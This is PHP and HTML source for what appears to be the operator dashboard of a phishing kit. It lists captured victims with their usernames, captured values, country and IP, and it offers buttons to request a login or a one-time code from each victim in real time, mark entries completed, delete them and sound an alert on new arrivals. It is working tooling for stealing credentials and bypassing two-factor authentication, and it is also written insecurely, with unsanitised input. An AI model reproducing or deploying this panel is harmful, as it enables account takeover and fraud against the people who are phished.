<title>Inevitable - line</title><meta http-equiv="cache-control" content="max-age=0" />

<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
 <link rel="shortcut icon" href="data:image/;base64, " />


<?php 
if( isset($_POST['sitename']) ){

$sitename = $_POST['sitename'];
$sitelink = $_POST['sitelink'];
$rows = @file("sitesx.txt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  
foreach($rows as $key => $row) {
    if(preg_match("/($sitename)/", $row)) {
        $line = explode("|", $row);
 $rows[$key] = str_replace($line[1],$sitelink,$rows[$key]);

file_put_contents("sitesx.txt", implode("\n", $rows));
      echo"updated";
      die('updated');
} 

}
$data = "
$sitename|$sitelink";

    $file=fopen("sitesx.txt","a");
    fwrite($file,$data);
    fclose($file);
echo'new';

}
if( isset($_GET['otp']) ){

$enil = $_GET['user'];
$gauth=$_GET['otp'];
$ax = 'progress';
$xa = 'line';
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($ax,$xa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
      echo 'Done';
die();
}}
}
if( isset($_GET['code']) ){

$enil = $_GET['user'];
$gauth=$_GET['otp'];
$af2x = 'progress';
$x2fa = 'af2zx';
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
      
        $rowsx = explode("|", $row);
echo $rowsx[5];
echo '<br>Done';
die();
}}}
if( isset($_GET['codelogin']) ){

$enil = $_GET['user'];
$gauth=$_GET['otp'];
$af2x = 'progress';
$x2fa = 'lfxaz';
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
      
        $rowsx = explode("|", $row);
echo '<br>Done';
die();
}}}


if( isset($_GET['x2fa']) )
{
    $user=$_GET['user'];
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($user)/", $row)) {

$line = explode("|", $row);
foreach($line as $i =>$key)

    echo $key .'</br>';

die();
    }
}

}

if( isset($_GET['dele']) )
{ 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  
$blacklist = $_GET['dele'];

foreach($rows as $key => $row) {
    if(preg_match("/($blacklist)/", $row)) {
          $file=fopen("dele.php","a");
    fwrite($file,$rows[$key]."\n");
    fclose($file);
        unset($rows[$key]);
file_put_contents("inevitable.php", implode("\n", $rows));
die('deleted');
    }
}
} 

$lines = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  
foreach($lines as $line)

{$pieces = explode("|", $line);
$spieces = explode("-", $pieces[3]);
 if ($pieces[5] == 'af2zx'){$status="green";}
 if ($pieces[5] == 'af2x'){$status="yellow";}
 if ($pieces[5] == 'line'){$status="none";}

 ?>

<html> <meta name="method" content="POST" />
<meta name="postData" content="submit=true&x=<?php echo $x;?>" />
    </head>

<body style="background-color:#7a97b9;">

<div id="sod"></div>
    

 <style>
table, th {
  border: 1px solid black;
  border-collapse: collapse;
}
.button-12 {
  display: flex;
  flex-direction: column;
  align-items: center;
  padding: 6px 14px;
  font-family: -apple-system, BlinkMacSystemFont, 'Roboto', sans-serif;
  border-radius: 6px;
  border: none;

  background: #6E6D70;
  box-shadow: 0px 0.5px 1px rgba(0, 0, 0, 0.1), inset 0px 0.5px 0.5px rgba(255, 255, 255, 0.5), 0px 0px 0px 0.5px rgba(0, 0, 0, 0.12);
  color: #DFDEDF;
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
}

.button-12:focus {
  box-shadow: inset 0px 0.8px 0px -0.25px rgba(255, 255, 255, 0.2), 0px 0.5px 1px rgba(0, 0, 0, 0.1), 0px 0px 0px 3.5px rgba(58, 108, 217, 0.5);
  outline: 0;
}
table, th, td {
  border: 1px solid black;
  border-collapse: collapse;
}

tr:nth-child(even) {
  background-color: rgba(150, 212, 212, 0.4);
}

th:nth-child(even),td:nth-child(even) {
  background-color: rgba(150, 212, 212, 0.4);
}
</style>

<table id="t<?php echo $pieces[0];?>l" width=100%  style="background-color:<?php echo $status;?>">
    <tr>
        <th scope="row">
<p id="<?php echo $pieces[0];?>"></p>

<script>
function l<?php echo $pieces[0];?>() {
  const xhttp = new XMLHttpRequest();
  xhttp.onload = function() {
    document.getElementById("<?php echo $pieces[0];?>").innerHTML = this.responseText;
  }
  xhttp.open("GET", "increment.php?x2fa&user=<?php echo $pieces[0];?>&" + Math.random());
  xhttp.send();
}
</script>
Country: <b><a href="https://iplocation.io/ip/<?php echo $spieces[1];?>" target=_blank><?php echo $pieces[3];?></a><input   class="w3-input" type="text" value="<?php echo $pieces[2];?>" id="my<?php echo $pieces[0];?>">
<button style="background:#3630a3;color:white;" onclick="myF<?php echo $pieces[0];?>();l<?php echo $pieces[0];?>();">Za'taak</button>
<script>
function myF<?php echo $pieces[0];?>() {
  var copyText = document.getElementById("my<?php echo $pieces[0];?>");

  copyText.select();
  copyText.setSelectionRange(0, 99999);
  navigator.clipboard.writeText(copyText.value);
}
</script>

</th>
        <td><button class="button-12" type="button" onclick="l<?php echo $pieces[0];?>x()">Request Login</button>

<p id="<?php echo $pieces[0];?>x"></p>

<script>
function l<?php echo $pieces[0];?>x() {
  const xhttp = new XMLHttpRequest();
  xhttp.onload = function() {
    document.getElementById("<?php echo $pieces[0];?>x").innerHTML = this.responseText;
  }
  xhttp.open("GET", "increment.php?codelogin&user=<?php echo $pieces[0];?>&" + Math.random());
  xhttp.send();
}
</script></td>
<td><button class="button-12" type="button" onclick="l<?php echo $pieces[0];?>c()">Request CODE</button>

<p id="<?php echo $pieces[0];?>c"></p>

<script>
function l<?php echo $pieces[0];?>c() {
  const xhttp = new XMLHttpRequest();
  xhttp.onload = function() {
    document.getElementById("<?php echo $pieces[0];?>c").innerHTML = this.responseText;
  }
  xhttp.open("GET", "increment.php?code&user=<?php echo $pieces[0];?>&" + Math.random());
  xhttp.send();
}
</script>
      <input   type="text" value="<?php echo $pieces[6];?>" id="my<?php echo $pieces[0];?>"></td>
        <td><button class="button-12" type="button" onclick="l<?php echo $pieces[0];?>o()">Completed</button>

<p id="<?php echo $pieces[0];?>o"></p>

<script>
function l<?php echo $pieces[0];?>o() {
  const xhttp = new XMLHttpRequest();
  xhttp.onload = function() {
    document.getElementById("<?php echo $pieces[0];?>o").innerHTML = this.responseText;
  }
  xhttp.open("GET", "increment.php?user=<?php echo $pieces[0];?>&otp=" + Math.random());
  xhttp.send();
}
</script></td>
        <td>

<button class="button-12" style="background:#3630a3;color:gray;" type="button" onclick="l<?php echo $pieces[0];?>y()">Delete data</button>

<p id="<?php echo $pieces[0];?>y"></p>

<script>
function l<?php echo $pieces[0];?>y() {
  const xhttp = new XMLHttpRequest();
  xhttp.onload = function() {
    document.getElementById("<?php echo $pieces[0];?>y").innerHTML = "Deleted";
  }
  xhttp.open("GET", "increment.php?dele=<?php echo $pieces[0];?>&" + Math.random());
  xhttp.send();
}
</script>

</td>  
    </tr> 
</table>


<?php 
} ?>
 
  <div align=center><audio id="xyz" src="assets/lib/pop.wav" preload="auto"></audio><b><font size=33><p id="secury"></p></font></b></div>

      <script type="text/javascript">

    setInterval(function() 
    {
      getData();
    }, 3500); 
    function getData() {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
          var splitResponse = this.responseText.split( "\n" );
          var count = 0;
            for(let i=0; i<splitResponse.length; i++)
                    count++;
          if (count ><?php echo $_GET['t'];?>){document.getElementById('xyz').play();
}
               document.getElementById("secury").innerHTML = '<a class=button-12 href=increment.php?t='+count+'>UPDATE -'+count+'</a><meta http-equiv="refresh" content="30;URL=increment.php?t='+count+'" /> \n';


        }
      };
      xhttp.open("GET", "inevitable.php", true);
      xhttp.send();
    }getData();
  </script><div align=center> <b>`( •̀ᴗ•́ )و ̑̑eVil - cross the line _ “They don’t call it a `fix` for nothing.”</b><br>
Stupidity isn’t a virus, but it’s spreading like one.
</div>
</body>
</html>
